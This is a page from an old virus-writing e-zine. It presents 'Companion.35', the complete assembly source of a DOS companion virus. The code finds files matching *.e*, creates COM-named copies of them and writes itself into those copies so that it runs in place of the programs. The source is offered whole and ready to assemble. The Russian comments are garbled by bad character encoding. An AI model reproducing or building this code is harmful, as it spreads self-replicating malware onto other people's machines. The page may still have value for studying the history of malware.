- [Duke's Virus Labs #9] - [Page 03] -

Companion.35
(c) by Deviator/HAZARD


  ⨬, ࠢ ᥣ    :(.
த ࠡᯮᥭ ⠪-   36 ⭨.

 㤥 ࠡ:     ᯮ祭 ॣ (Si<>100h)
                      ᫨ Ch=0   (.  ᯮ ᪮)
                      ᫨  PSP  窨 ('.'  2Eh)

  Deviator/HAZARD.

===== Cut here =====
.model tiny
.386
.code
        org 100h
Mt_35:  db      '*.e*'          ;  ᪠  (Sub Ch,[xxxx]

        mov ah,4eh              ; 饬 䠩
Gotcha: mov dx,si               ; Dx = 100h
        int 21h                 ; Dos

        mov dx,9Eh              ; Dx = 9Eh
        mov ax,5B00h+'.'        ; 饬 '.'
repne   scasb                   ; Lets Go
        mov [di],'MOC'          ; 塞 ७  COM
        mov cx,si               ; Cx = 256 (100h) , Ch  
        int 21h                 ; Ah = 5B,ᮧ 䠩 ᫨  
        xchg ax,bx              ; Handle  Bx
        mov ah,40h              ; 訬  (Cx=100)
        jnc Gotcha              ;  Gotcha ᫨  訡
        ret                     ;  室

end     Mt_35
===== Cut here =====
